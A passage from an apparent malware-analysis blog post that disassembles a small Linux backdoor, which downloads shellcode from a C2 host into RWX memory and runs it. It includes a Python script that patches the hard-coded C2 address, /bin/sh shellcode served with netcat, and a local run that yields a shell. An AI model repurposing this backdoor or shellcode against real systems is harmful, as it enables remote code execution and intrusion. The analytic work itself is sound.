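def connect_with_retries(host, port, attempts=10, delay=5.0):
    """Return a connected socket, or None once every attempt has failed."""
    for attempt in range(attempts):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((host, port))
            return sock                # like `jns 0x4000ee`: connect succeeded
        except OSError:
            sock.close()
        if attempt == attempts - 1:    # like `dec r9` reaching zero
            return None
        time.sleep(delay)              # like nanosleep with tv_sec = 5
    return None
```

Calling connect_with_retries("127.0.0.1", 1337) against a closed port returns None after roughly 45 seconds, since there are nine sleeps between the ten attempts.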

We are approaching the end of the backdoor and the magic is going to kick in. Here is the final assembly snippet:

0x004000de      pop rcx
0x004000df      pop rcx
0x004000e0      pop rdi
0x004000e1      test rax, rax
0x004000e4      jns 0x4000ad       ; jump back and retry connect if nanosleep succeeded (RAX >= 0)
0x004000e6      push 0x3c          ; gets here if socket unsuccessful or tried connecting 10 times or read failed or mmap failed
0x004000e8      pop rax
0x004000e9      push 1             
0x004000eb      pop rdi
0x004000ec      syscall            ; exit syscall
0x004000ee      pop rsi            ; gets here if connect successful, so RAX=0, rsi=mmapped address popped from the stack
0x004000ef      pop rdx            ; 4096 bytes to be read from connect file descriptor
0x004000f0      syscall            ; read syscall; rdi=connect file descriptor
0x004000f2      test rax, rax
0x004000f5      js 0x4000e6
0x004000f7      jmp rsi            ; execute the bytes read from the connect syscall (shellcode) in the memory mapped address space

This code block contains the exit syscall, which is hit whenever one of the other syscalls fails (mmap, socket, connect, read). Right after it, the read syscall uses the memory-mapped address saved on the stack as its buffer and does exactly what its name says: it reads bytes (4096 at most) from the socket file descriptor used by the connect syscall and places them in the buffer. If no error arises, execution is passed to the opcodes starting at the address held in the RSI register, that is, the memory-mapped region (marked as RWX) that also served as the read buffer for the shellcode received over the connection.

In other words, this tiny 249-byte backdoor achieves in-memory execution of arbitrary, remotely downloaded shellcode. There are no opsec features such as a decoding/decryption routine for the downloaded shellcode or a custom ELF packer scheme, so the C2 software for the backdoor can be anything capable of transmitting predetermined shellcode over a network socket, and anyone with a hex editor can change the sockaddr structure to modify the C2 IP and reuse the backdoor.

Let’s try that and modify the contents of the connect syscall addr structure loaded at address 0x004000ad. Address 127.0.0.1 with port 1337 translates to 0x0100007f39050002; any hex editor, such as bless, is enough to patch the backdoor.
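For those who prefer a script to a hex editor, here is a minimal sketch of the same patch. The helper names are hypothetical, and the demo blob only contains the movabs rcx / push rcx bytes from the disassembly rather than the real binary; reading and writing the actual file is left out.

```python
import socket
import struct


def encode_sockaddr_in(ip: str, port: int) -> bytes:
    """Build the 8 bytes pushed on the stack: family, port, IPv4 address."""
    return struct.pack("<H", 2) + struct.pack(">H", port) + socket.inet_aton(ip)


def patch_c2(blob: bytes, old, new) -> bytes:
    """Swap one (ip, port) pair for another; refuse ambiguous matches."""
    old_raw = encode_sockaddr_in(*old)
    new_raw = encode_sockaddr_in(*new)
    if blob.count(old_raw) != 1:
        raise ValueError("expected exactly one sockaddr match")
    return blob.replace(old_raw, new_raw)


new_imm = int.from_bytes(encode_sockaddr_in("127.0.0.1", 1337), "little")
print(f"{new_imm:#018x}")  # 0x0100007f39050002

# Demo on the instruction bytes only: movabs rcx, imm64 ; push rcx
demo = bytes.fromhex("48b9") + encode_sockaddr_in("104.248.237.194", 1337) + b"\x51"
patched = patch_c2(demo, ("104.248.237.194", 1337), ("127.0.0.1", 1337))
print(patched.hex())
```

Matching on the full 8-byte structure rather than on a fixed file offset avoids having to translate the virtual address 0x004000ad into a file offset, at the cost of failing if the pattern is not unique.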

We are using a [/bin/sh shellcode](http://shell-storm.org/shellcode/files/shellcode-806.php) for a local test:

python -c "print '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'" | nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
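Before serving bytes like these it is worth checking what they do. In this shellcode the eight bytes after the 48 bb opcode (movabs rbx) are followed by 48 f7 db (neg rbx), so the path string is stored negated. A small sketch that undoes the negation, assuming the offsets below match the byte string above:

```python
MASK64 = 0xFFFFFFFFFFFFFFFF

shellcode = bytes.fromhex(
    "31c0"                  # xor eax, eax
    "48bbd19d9691d08c97ff"  # movabs rbx, 0xff978cd091969dd1
    "48f7db"                # neg rbx
    "53545f995257545e"      # build argv/envp pointers on the stack
    "b03b0f05"              # mov al, 59 ; syscall (execve)
)

imm = int.from_bytes(shellcode[4:12], "little")
decoded = ((-imm) & MASK64).to_bytes(8, "little")  # two's complement negate
print(decoded)
```

The decoded value is the NUL-terminated string /bin/sh, which matches the result of echo $0 in the test run.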

Finally, firing up the patched backdoor:

root@remnux:/home/remnux/Desktop/backdoor# ./pay_patched.bin
# echo $0
/bin/sh

That’s it: a repurposed backdoor. Writing this post allowed me to better understand the logic flow that the malware author(s) chose for the backdoor, as well as Linux in-memory shellcode execution.

Repurposing a Linux Assembly backdoor caught in the wild